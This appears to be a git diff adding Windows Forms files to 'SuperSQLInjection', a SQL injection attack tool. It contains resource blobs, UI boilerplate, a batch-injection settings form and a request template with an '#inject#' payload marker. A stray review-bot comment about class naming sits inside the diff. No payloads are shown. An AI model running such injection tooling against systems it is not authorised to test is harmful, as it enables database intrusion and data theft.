AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8 + AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc + AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw + AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/ + AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA + DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/ + AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/ + AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0 + ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ + AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/ + AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs + Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA + A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA + AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA + AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA + AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA + AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs= + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + 
Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + 417, 52 + + + 17, 52 + + + GET /access.asp?id=1<sEncode>#inject#<eEncode> HTTP/1.1 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Host: 127.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +User-Agent: sqlmap/1.0-dev (http://sqlmap.org) +Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 +Connection: close +Pragma: no-cache +Cache-Control: no-cache,no-store + + + 988, 14 + + + 806, 14 + + + 648, 14 + + + 608, 52 + + + 729, 52 + + + 852, 52 + + + 100 + + \ No newline at end of file diff --git a/SuperSQLInjection/Program.cs b/SuperSQLInjection/Program.cs new file mode 100644 index 0000000..2f12dc0 --- /dev/null +++ b/SuperSQLInjection/Program.cs 
@@ -0,0 +1,20 @@
+using System;
+using System.Collections.Generic;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ static class Program
+ {
+ ///
+ /// 应用程序的主入口点。
+ ///
+ [STAThread]
+ static void Main()
+ {
+ Application.EnableVisualStyles();
+ Application.SetCompatibleTextRenderingDefault(false);
+ Application.Run(new Main());
+ }
+ }
+}
diff --git a/SuperSQLInjection/ProgressBar.Designer.cs b/SuperSQLInjection/ProgressBar.Designer.cs
new file mode 100644
index 0000000..3eca654
--- /dev/null
+++ b/SuperSQLInjection/ProgressBar.Designer.cs
@@ -0,0 +1,46 @@ +namespace SuperSQLInjection +{ + partial class ProgressBar + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.SuspendLayout(); + // + // ProgressBar + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(487, 146); + this.Name = "ProgressBar"; + this.Text = "ProgressBar"; + this.ResumeLayout(false); + + } + + #endregion + } +} \ No newline at end of file
diff --git a/SuperSQLInjection/ProgressBar.cs b/SuperSQLInjection/ProgressBar.cs
new file mode 100644
index 0000000..365dd06
--- /dev/null
+++ b/SuperSQLInjection/ProgressBar.cs
@@ -0,0 +1,19 @@ +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Data; +using System.Drawing; +using System.Linq; +using System.Text; +using System.Windows.Forms; + +namespace SuperSQLInjection +{ + public partial class ProgressBar : Form + { + public ProgressBar() + { + InitializeComponent(); + } + } +} diff --git a/SuperSQLInjection/ProgressBar.resx b/SuperSQLInjection/ProgressBar.resx new file mode 100644 index 0000000..1af7de1 --- /dev/null +++ b/SuperSQLInjection/ProgressBar.resx @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/Properties/AssemblyInfo.cs b/SuperSQLInjection/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..43aed63 --- /dev/null +++ b/SuperSQLInjection/Properties/AssemblyInfo.cs 
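Review bot: The form class in ProgressBar.cs is named `ProgressBar` while the file imports `System.Windows.Forms`, so inside `namespace SuperSQLInjection` the simple name `ProgressBar` resolves to this form and not to the WinForms control of the same name. Any later code in the namespace that wants the control has to write `System.Windows.Forms.ProgressBar` in full, which is easy to get wrong. A distinct name such as `ProgressForm` would avoid the clash; the rename would also have to be applied in ProgressBar.Designer.cs and ProgressBar.resx. The class has no doc comment either; something like `/// <summary>Placeholder form; the constructor only calls InitializeComponent().</summary>` would record that it is currently empty.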
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// 有关程序集的常规信息通过以下
+// 特性集控制。更改这些特性值可修改
+// 与程序集关联的信息。
+[assembly: AssemblyTitle("SuperSQLInjection")]
+[assembly: AssemblyDescription("design by shack2")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("www.shack2.org")]
+[assembly: AssemblyProduct("SuperSQLInjection")]
+[assembly: AssemblyCopyright("Copyright © 2014-2016")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// 将 ComVisible 设置为 false 使此程序集中的类型
+// 对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型,
+// 则将该类型上的 ComVisible 特性设置为 true。
+[assembly: ComVisible(false)]
+
+// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
+[assembly: Guid("d5688068-fc89-467d-913f-037a785caca7")]
+
+// 程序集的版本信息由下面四个值组成:
+//
+// 主版本
+// 次版本
+// 内部版本号
+// 修订号
+//
+// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
+// 方法是按如下所示使用“*”:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.2016.05.25")]
+[assembly: AssemblyFileVersion("1.2016.05.25")]
diff --git a/SuperSQLInjection/Properties/Resources.Designer.cs b/SuperSQLInjection/Properties/Resources.Designer.cs
new file mode 100644
index 0000000..29fb78d
--- /dev/null
+++ b/SuperSQLInjection/Properties/Resources.Designer.cs
@@ -0,0 +1,63 @@ +//------------------------------------------------------------------------------ +// +// 此代码由工具生成。 +// 运行时版本:4.0.30319.42000 +// +// 对此文件的更改可能会导致不正确的行为,并且如果 +// 重新生成代码,这些更改将会丢失。 +// +//------------------------------------------------------------------------------ + +namespace SuperSQLInjection.Properties { + using System; + + + /// + /// 一个强类型的资源类,用于查找本地化的字符串等。 + /// + // 此类是由 StronglyTypedResourceBuilder + // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 + // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen + // (以 /str 作为命令选项),或重新生成 VS 项目。 + [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] + [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] + [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] + internal class Resources { + + private static global::System.Resources.ResourceManager resourceMan; + + private static global::System.Globalization.CultureInfo resourceCulture; + + [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] + internal Resources() { + } + + /// + /// 返回此类使用的缓存的 ResourceManager 实例。 + /// + [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] + internal static global::System.Resources.ResourceManager ResourceManager { + get { + if (object.ReferenceEquals(resourceMan, null)) { + global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SuperSQLInjection.Properties.Resources", typeof(Resources).Assembly); + resourceMan = temp; + } + return resourceMan; + } + } + + /// + /// 使用此强类型资源类,为所有资源查找 + /// 重写当前线程的 CurrentUICulture 属性。 + /// + [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] + internal static global::System.Globalization.CultureInfo Culture { + get { + return resourceCulture; + } + set { + 
resourceCulture = value; + } + } + } +} diff --git a/SuperSQLInjection/Properties/Resources.resx b/SuperSQLInjection/Properties/Resources.resx new file mode 100644 index 0000000..af7dbeb --- /dev/null +++ b/SuperSQLInjection/Properties/Resources.resx @@ -0,0 +1,117 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/Properties/Settings.Designer.cs b/SuperSQLInjection/Properties/Settings.Designer.cs new file mode 100644 index 0000000..d227d01 --- /dev/null +++ b/SuperSQLInjection/Properties/Settings.Designer.cs @@ -0,0 +1,26 @@ +//------------------------------------------------------------------------------ +// +// 此代码由工具生成。 +// 运行时版本:4.0.30319.42000 +// +// 对此文件的更改可能会导致不正确的行为,并且如果 +// 重新生成代码,这些更改将会丢失。 +// +//------------------------------------------------------------------------------ + +namespace SuperSQLInjection.Properties { + + + [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] + [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")] + internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { + + private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); + + public static Settings Default { + get { + return defaultInstance; + } + } + } +} diff --git a/SuperSQLInjection/Properties/Settings.settings b/SuperSQLInjection/Properties/Settings.settings new file mode 100644 index 0000000..3964565 --- /dev/null 
+++ b/SuperSQLInjection/Properties/Settings.settings @@ -0,0 +1,7 @@ + + + + + + + diff --git a/SuperSQLInjection/Properties/app.manifest b/SuperSQLInjection/Properties/app.manifest new file mode 100644 index 0000000..6230e10 --- /dev/null +++ b/SuperSQLInjection/Properties/app.manifest @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/SuperSQLInjection/SETING~1.RES b/SuperSQLInjection/SETING~1.RES new file mode 100644 index 0000000..1af7de1 --- /dev/null +++ b/SuperSQLInjection/SETING~1.RES @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/Seting.Designer.cs b/SuperSQLInjection/Seting.Designer.cs new file mode 100644 index 0000000..4e1a507 --- /dev/null +++ b/SuperSQLInjection/Seting.Designer.cs 
@@ -0,0 +1,265 @@ +namespace SuperSQLInjection +{ + partial class Seting + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.groupBox1 = new System.Windows.Forms.GroupBox(); + this.lbl_maxColumnsCount = new System.Windows.Forms.Label(); + this.cob_maxClolumnsCount = new System.Windows.Forms.ComboBox(); + this.chk_isAutoSaveConfig = new System.Windows.Forms.CheckBox(); + this.chk_autoCheckUpdate = new System.Windows.Forms.CheckBox(); + this.chk_mysqlMuStr = new System.Windows.Forms.CheckBox(); + this.chk_openHTTPLog = new System.Windows.Forms.CheckBox(); + this.chk_openInfoLog = new System.Windows.Forms.CheckBox(); + this.label1 = new System.Windows.Forms.Label(); + this.cob_oneDomainMaxSpiderCount = new System.Windows.Forms.ComboBox(); + this.cob_oneDomainMaxScanCount = new System.Windows.Forms.ComboBox(); + this.label2 = new System.Windows.Forms.Label(); + this.groupBox2 = new System.Windows.Forms.GroupBox(); + this.chk_redirectDoGet = new System.Windows.Forms.CheckBox(); + this.groupBox1.SuspendLayout(); + this.groupBox2.SuspendLayout(); + this.SuspendLayout(); + // + // groupBox1 + // + this.groupBox1.Controls.Add(this.chk_redirectDoGet); + this.groupBox1.Controls.Add(this.lbl_maxColumnsCount); + this.groupBox1.Controls.Add(this.cob_maxClolumnsCount); + this.groupBox1.Controls.Add(this.chk_isAutoSaveConfig); + this.groupBox1.Controls.Add(this.chk_autoCheckUpdate); + 
this.groupBox1.Controls.Add(this.chk_mysqlMuStr); + this.groupBox1.Controls.Add(this.chk_openHTTPLog); + this.groupBox1.Controls.Add(this.chk_openInfoLog); + this.groupBox1.Location = new System.Drawing.Point(12, 12); + this.groupBox1.Name = "groupBox1"; + this.groupBox1.Size = new System.Drawing.Size(487, 171); + this.groupBox1.TabIndex = 0; + this.groupBox1.TabStop = false; + this.groupBox1.Text = "系统配置"; + // + // lbl_maxColumnsCount + // + this.lbl_maxColumnsCount.AutoSize = true; + this.lbl_maxColumnsCount.Location = new System.Drawing.Point(17, 89); + this.lbl_maxColumnsCount.Name = "lbl_maxColumnsCount"; + this.lbl_maxColumnsCount.Size = new System.Drawing.Size(65, 12); + this.lbl_maxColumnsCount.TabIndex = 6; + this.lbl_maxColumnsCount.Text = "最大列数:"; + // + // cob_maxClolumnsCount + // + this.cob_maxClolumnsCount.FormattingEnabled = true; + this.cob_maxClolumnsCount.Items.AddRange(new object[] { + "5", + "10", + "15", + "20", + "30", + "40", + "50", + "60", + "70", + "80", + "90", + "100", + "150", + "200"}); + this.cob_maxClolumnsCount.Location = new System.Drawing.Point(88, 86); + this.cob_maxClolumnsCount.Name = "cob_maxClolumnsCount"; + this.cob_maxClolumnsCount.Size = new System.Drawing.Size(70, 20); + this.cob_maxClolumnsCount.TabIndex = 5; + this.cob_maxClolumnsCount.SelectedValueChanged += new System.EventHandler(this.cob_maxClolumnsCount_SelectedValueChanged); + // + // chk_isAutoSaveConfig + // + this.chk_isAutoSaveConfig.AutoSize = true; + this.chk_isAutoSaveConfig.Location = new System.Drawing.Point(276, 88); + this.chk_isAutoSaveConfig.Name = "chk_isAutoSaveConfig"; + this.chk_isAutoSaveConfig.Size = new System.Drawing.Size(144, 16); + this.chk_isAutoSaveConfig.TabIndex = 4; + this.chk_isAutoSaveConfig.Text = "软件关闭自动保存配置"; + this.chk_isAutoSaveConfig.UseVisualStyleBackColor = true; + this.chk_isAutoSaveConfig.CheckedChanged += new System.EventHandler(this.chk_isAutoSaveConfig_CheckedChanged); + // + // chk_autoCheckUpdate + // + 
this.chk_autoCheckUpdate.AutoSize = true; + this.chk_autoCheckUpdate.Location = new System.Drawing.Point(276, 20); + this.chk_autoCheckUpdate.Name = "chk_autoCheckUpdate"; + this.chk_autoCheckUpdate.Size = new System.Drawing.Size(120, 16); + this.chk_autoCheckUpdate.TabIndex = 1; + this.chk_autoCheckUpdate.Text = "开启自动检测更新"; + this.chk_autoCheckUpdate.UseVisualStyleBackColor = true; + this.chk_autoCheckUpdate.CheckedChanged += new System.EventHandler(this.chk_autoCheckUpdate_CheckedChanged); + // + // chk_mysqlMuStr + // + this.chk_mysqlMuStr.AutoSize = true; + this.chk_mysqlMuStr.Location = new System.Drawing.Point(19, 20); + this.chk_mysqlMuStr.Name = "chk_mysqlMuStr"; + this.chk_mysqlMuStr.Size = new System.Drawing.Size(150, 16); + this.chk_mysqlMuStr.TabIndex = 0; + this.chk_mysqlMuStr.Text = "开启MySQL多字节取数据"; + this.chk_mysqlMuStr.UseVisualStyleBackColor = true; + this.chk_mysqlMuStr.CheckedChanged += new System.EventHandler(this.chk_mysqlMuStr_CheckedChanged); + // + // chk_openHTTPLog + // + this.chk_openHTTPLog.AutoSize = true; + this.chk_openHTTPLog.Location = new System.Drawing.Point(276, 51); + this.chk_openHTTPLog.Name = "chk_openHTTPLog"; + this.chk_openHTTPLog.Size = new System.Drawing.Size(96, 16); + this.chk_openHTTPLog.TabIndex = 2; + this.chk_openHTTPLog.Text = "开启发包日志"; + this.chk_openHTTPLog.UseVisualStyleBackColor = true; + this.chk_openHTTPLog.CheckedChanged += new System.EventHandler(this.chk_openHTTPLog_CheckedChanged); + // + // chk_openInfoLog + // + this.chk_openInfoLog.AutoSize = true; + this.chk_openInfoLog.Location = new System.Drawing.Point(19, 51); + this.chk_openInfoLog.Name = "chk_openInfoLog"; + this.chk_openInfoLog.Size = new System.Drawing.Size(96, 16); + this.chk_openInfoLog.TabIndex = 1; + this.chk_openInfoLog.Text = "开启底部日志"; + this.chk_openInfoLog.UseVisualStyleBackColor = true; + this.chk_openInfoLog.CheckedChanged += new System.EventHandler(this.chk_openInfoLog_CheckedChanged); + // + // label1 + // + this.label1.AutoSize = 
true; + this.label1.Location = new System.Drawing.Point(17, 34); + this.label1.Name = "label1"; + this.label1.Size = new System.Drawing.Size(113, 12); + this.label1.TabIndex = 8; + this.label1.Text = "单域名最大爬行数:"; + // + // cob_oneDomainMaxSpiderCount + // + this.cob_oneDomainMaxSpiderCount.FormattingEnabled = true; + this.cob_oneDomainMaxSpiderCount.Items.AddRange(new object[] { + "3", + "5", + "10", + "15", + "20", + "30", + "40", + "50"}); + this.cob_oneDomainMaxSpiderCount.Location = new System.Drawing.Point(136, 31); + this.cob_oneDomainMaxSpiderCount.Name = "cob_oneDomainMaxSpiderCount"; + this.cob_oneDomainMaxSpiderCount.Size = new System.Drawing.Size(70, 20); + this.cob_oneDomainMaxSpiderCount.TabIndex = 7; + this.cob_oneDomainMaxSpiderCount.SelectedValueChanged += new System.EventHandler(this.cob_oneDomainMaxSpiderCount_SelectedValueChanged); + // + // cob_oneDomainMaxScanCount + // + this.cob_oneDomainMaxScanCount.FormattingEnabled = true; + this.cob_oneDomainMaxScanCount.Items.AddRange(new object[] { + "3", + "5", + "10", + "15", + "20"}); + this.cob_oneDomainMaxScanCount.Location = new System.Drawing.Point(393, 31); + this.cob_oneDomainMaxScanCount.Name = "cob_oneDomainMaxScanCount"; + this.cob_oneDomainMaxScanCount.Size = new System.Drawing.Size(70, 20); + this.cob_oneDomainMaxScanCount.TabIndex = 7; + this.cob_oneDomainMaxScanCount.SelectedValueChanged += new System.EventHandler(this.cob_oneDomainMaxScanCount_SelectedValueChanged); + // + // label2 + // + this.label2.AutoSize = true; + this.label2.Location = new System.Drawing.Point(274, 34); + this.label2.Name = "label2"; + this.label2.Size = new System.Drawing.Size(113, 12); + this.label2.TabIndex = 8; + this.label2.Text = "单域名最大扫描数:"; + // + // groupBox2 + // + this.groupBox2.Controls.Add(this.label2); + this.groupBox2.Controls.Add(this.label1); + this.groupBox2.Controls.Add(this.cob_oneDomainMaxScanCount); + this.groupBox2.Controls.Add(this.cob_oneDomainMaxSpiderCount); + this.groupBox2.Location = 
new System.Drawing.Point(12, 204); + this.groupBox2.Name = "groupBox2"; + this.groupBox2.Size = new System.Drawing.Size(487, 75); + this.groupBox2.TabIndex = 9; + this.groupBox2.TabStop = false; + this.groupBox2.Text = "批量注入设置"; + // + // chk_redirectDoGet + // + this.chk_redirectDoGet.AutoSize = true; + this.chk_redirectDoGet.Location = new System.Drawing.Point(19, 131); + this.chk_redirectDoGet.Name = "chk_redirectDoGet"; + this.chk_redirectDoGet.Size = new System.Drawing.Size(126, 16); + this.chk_redirectDoGet.TabIndex = 7; + this.chk_redirectDoGet.Text = "重定向使用GET请求"; + this.chk_redirectDoGet.UseVisualStyleBackColor = true; + this.chk_redirectDoGet.CheckedChanged += new System.EventHandler(this.chk_redirectDoGet_CheckedChanged); + // + // Seting + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(519, 300); + this.Controls.Add(this.groupBox2); + this.Controls.Add(this.groupBox1); + this.Name = "Seting"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "系统设置"; + this.Shown += new System.EventHandler(this.Seting_Shown); + this.groupBox1.ResumeLayout(false); + this.groupBox1.PerformLayout(); + this.groupBox2.ResumeLayout(false); + this.groupBox2.PerformLayout(); + this.ResumeLayout(false); + + } + + #endregion + + private System.Windows.Forms.GroupBox groupBox1; + private System.Windows.Forms.CheckBox chk_mysqlMuStr; + private System.Windows.Forms.CheckBox chk_openInfoLog; + private System.Windows.Forms.CheckBox chk_openHTTPLog; + private System.Windows.Forms.CheckBox chk_autoCheckUpdate; + private System.Windows.Forms.CheckBox chk_isAutoSaveConfig; + private System.Windows.Forms.Label lbl_maxColumnsCount; + private System.Windows.Forms.ComboBox cob_maxClolumnsCount; + private System.Windows.Forms.Label label1; + private System.Windows.Forms.ComboBox cob_oneDomainMaxSpiderCount; + private 
System.Windows.Forms.ComboBox cob_oneDomainMaxScanCount; + private System.Windows.Forms.Label label2; + private System.Windows.Forms.GroupBox groupBox2; + private System.Windows.Forms.CheckBox chk_redirectDoGet; + } +} \ No newline at end of file diff --git a/SuperSQLInjection/Seting.cs b/SuperSQLInjection/Seting.cs new file mode 100644 index 0000000..7a512a6 --- /dev/null +++ b/SuperSQLInjection/Seting.cs 
@@ -0,0 +1,82 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class Seting : Form
+ {
+ public Seting(Main main)
+ {
+ InitializeComponent();
+ this.main = main;
+ }
+
+ private Main main = null;
+
+ private void chk_mysqlMuStr_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isMuStr = this.chk_mysqlMuStr.Checked;
+ }
+
+ private void chk_openInfoLog_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isOpenInfoLog = this.chk_openInfoLog.Checked;
+ }
+
+ private void chk_openHTTPLog_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isOpenHTTPLog = this.chk_openHTTPLog.Checked;
+ }
+
+ private void chk_autoCheckUpdate_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isAutoCheckUpdate = this.chk_autoCheckUpdate.Checked;
+ }
+
+
+
+ private void chk_isAutoSaveConfig_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isSavaConfigWhenClose = this.chk_isAutoSaveConfig.Checked;
+ }
+
+ private void Seting_Shown(object sender, EventArgs e)
+ {
+ this.chk_openHTTPLog.Checked = main.config.isOpenHTTPLog;
+ this.chk_openInfoLog.Checked = main.config.isOpenInfoLog;
+ this.chk_mysqlMuStr.Checked = main.config.isMuStr;
+ this.chk_autoCheckUpdate.Checked = main.config.isAutoCheckUpdate;
+ this.chk_isAutoSaveConfig.Checked = main.config.isSavaConfigWhenClose;
+ this.cob_maxClolumnsCount.Text = main.config.maxClolumns.ToString();
+ this.cob_oneDomainMaxSpiderCount.Text = main.config.maxSpiderCount.ToString();
+ this.cob_oneDomainMaxScanCount.Text = main.config.maxScanCount.ToString();
+ this.chk_redirectDoGet.Checked=main.config.redirectDoGet;
+
+ }
+
+ private void cob_maxClolumnsCount_SelectedValueChanged(object sender, EventArgs e)
+ {
+ main.config.maxClolumns = int.Parse(this.cob_maxClolumnsCount.Text);
+ }
+
+ private void 
cob_oneDomainMaxSpiderCount_SelectedValueChanged(object sender, EventArgs e) + { + main.config.maxSpiderCount = int.Parse(this.cob_oneDomainMaxSpiderCount.Text); + } + + private void cob_oneDomainMaxScanCount_SelectedValueChanged(object sender, EventArgs e) + { + main.config.maxScanCount = int.Parse(this.cob_oneDomainMaxScanCount.Text); + } + + private void chk_redirectDoGet_CheckedChanged(object sender, EventArgs e) + { + main.config.redirectDoGet = this.chk_redirectDoGet.Checked; + } + } +} diff --git a/SuperSQLInjection/Seting.resx b/SuperSQLInjection/Seting.resx new file mode 100644 index 0000000..1af7de1 --- /dev/null +++ b/SuperSQLInjection/Seting.resx @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, 